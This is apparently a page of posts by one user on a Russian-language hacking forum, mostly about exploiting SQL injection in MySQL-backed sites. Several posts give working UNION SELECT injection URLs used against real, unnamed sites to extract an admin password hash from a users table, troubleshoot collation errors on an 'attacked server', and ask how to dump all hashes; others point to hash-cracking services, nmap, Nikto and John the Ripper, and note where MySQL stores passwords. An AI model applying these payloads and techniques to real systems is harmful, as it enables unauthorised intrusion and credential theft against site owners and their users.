Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 2 3 4 5 След.
sql-injection mysql
 
Мдя,  версия 3.23 довольно старая, но получить от нее что-нить полезное действительно можно. Например, можно замутить технику посимвольного перебора. Вот статья. С помощью нее можно вопервых обойти magic_quotes_gpc, во-вторых очень удобно использовать эту технику при старых версиях MySQL - как раз в твоем случае
Сканер уязвимостей
 
Чесно говоря вообще не видел в вебе онлайн-сканеров уязвимостей... Зато могу посоветовать сканер на перле Nikto, который можно запустить с своего шела
John thr Ripper, автоматикал, Как?
 
Конечно можно! Он для этого и сушествует чтоб его на шелах запускали =) А лучше джоника ты ничего не найдешь, так что юзай только его. Кстати, на сайте RST есть статейка про использование джона...
Windows XP SP2, Some Problems...
 
Поставь файрвол/проверь на вирусы/выкинь комп, купи новый...
MySQL и кодировки, Народ, как можно избежать ошибок с кодировками
 
Нихрина не получается...
News Query Failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'convert(database() using utf8)/* ORDER BY publish_date DESC LIMIT 0, 4' at line 1
MySQL и кодировки, Народ, как можно избежать ошибок с кодировками
 
ZaCo, здарова! Я тя знаю, ты с Zadoxlik'ом Хакер.ру взломал...
Первый раз встречаю такую функцию convert()...Ща попробую конвертнуть базу
взлом
 
Заюзай nmap - потом  видно будет =)
MySQL и кодировки, Народ, как можно избежать ошибок с кодировками
 
Я во все места запихивал этот COLLATE и на локалхосте и на аттакуемом серваке - ничего не выходит =/ Пробовал и  latin1_swedish_ci' и utf8_general_ci Щас попробую так: COLLATE'binary"
MySQL и кодировки, Народ, как можно избежать ошибок с кодировками
 
Когда пробую вот так:
http://www.site.com/script.php?ID=999+UNION+SELECT+0,DATABASE(),0,0,0,0+COLLATE+utf8_general_ci/*
вот такой глюк выскакивает:
News Query Failed: COLLATION 'latin1_swedish_ci' is not valid for CHARACTER SET 'binary'

А вот куда вставлять "_кодировка" я не понял...
Взлом МТС!!!!
 
2 NSD
Ты действительно NSD? А то может какой-нибудь ламер подписался таким именем. Если ошибаюсь - не пинать!
SQL injection?, проходит или нет?
 
Тут если хорошо покопаться, то можно попытаться провести UNION. хотя врядли получится...
MySQL и кодировки, Народ, как можно избежать ошибок с кодировками
 
Пасиба!!! Ща буду твою доку читать =)
MySQL и кодировки, Народ, как можно избежать ошибок с кодировками
 
Пытался получить системную инфу с помощью запроса:
http://www.site.com/news.php?ID=9999+union+select+null,DATABASE(),null,null,null,null/*
Но получил такое сообщение:
News Query Failed: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Насколько я понял тут проблема с кодировками. Подскажите мне как можно успешно провести мой запрос?
MySQL injection..., Проблема...
 
Цитата
Олег Белкин пишет:
подскажите пожалуйста начинющему админу Б.Д. после бэкапа базы при попытки войти в неё выходит следующее сообщение " list index out bunds (-1)" что за ошибка и как её исправить
Это уже оффтоп! Тут тема совсем не про твою проблему.
Цитата
USvER пишет:
Есть уязвимость... кавычка фильтруется(char()-срабатывает но писать в файл немогу, только чтение из файлов и базы)
У меня похожая на твою ситуация, также как ты натаскал хешей, правда сервак виндовый и не могу читать файлы...
Цитата
USvER пишет:
ООЧЕНЬ ДОЛГО ИХ БРУТФОРСИТЬ(пробовал по словарю (50 мег) ничего не подобрало....
Зайди на www.passcrack.spb.ru, там и по словарю и тупым перебором можно попробывать, меня например частенько спасает=)
Ошибки на сервере ********.ru, Очень много!
 
Банальный инклуд...
Цитата
Nixen пишет:
Ну есть проблемка: этот скрипт находится в деректроии. /audio***/ и вроде читает только свои файлы
Почему ты так решил?
SQL Injection, Помогите, плиzzz!
 
Ясно...значит только ручками...ну ладно, все равно спасибо за ответ =)
SQL Injection, Помогите, плиzzz!
 
История такая: нашел сайт с бажным скриптом, который обращается к БД и выводит топик:
http://www.site.com/topic.php?ID=44
После подстановки кавычки получил ошибку, затем успешно провел UNION:
http://www.site.com/topic.php?ID=44+UNION+SELECT+0,0,0,0,password,0+FROM+users+LIMIT+1,1/*
Получил хеш админа. Вопрос вот в чем: как бы мне сразу все хеши из таблицы получить?
вопрос по SQL
 
Пароли от базы MySQL хранятся в таблице mysql.user (поле mysql.user.password).
Языки Программирования
 
Цитата
Пафнутий Хабибубен пишет:
говорят очень хороший язык - Phyton, но мне хотелось бы услышать мнение профи
не Phyton, а Python. А вообще лучше начинать с Васика
Доступ к TCP/IP
 
Зайди на Antichat.ru, там есть статьи типа Anti-admin(Lan version) и др.  :)
Страницы: Пред. 1 2 3 4 5 След.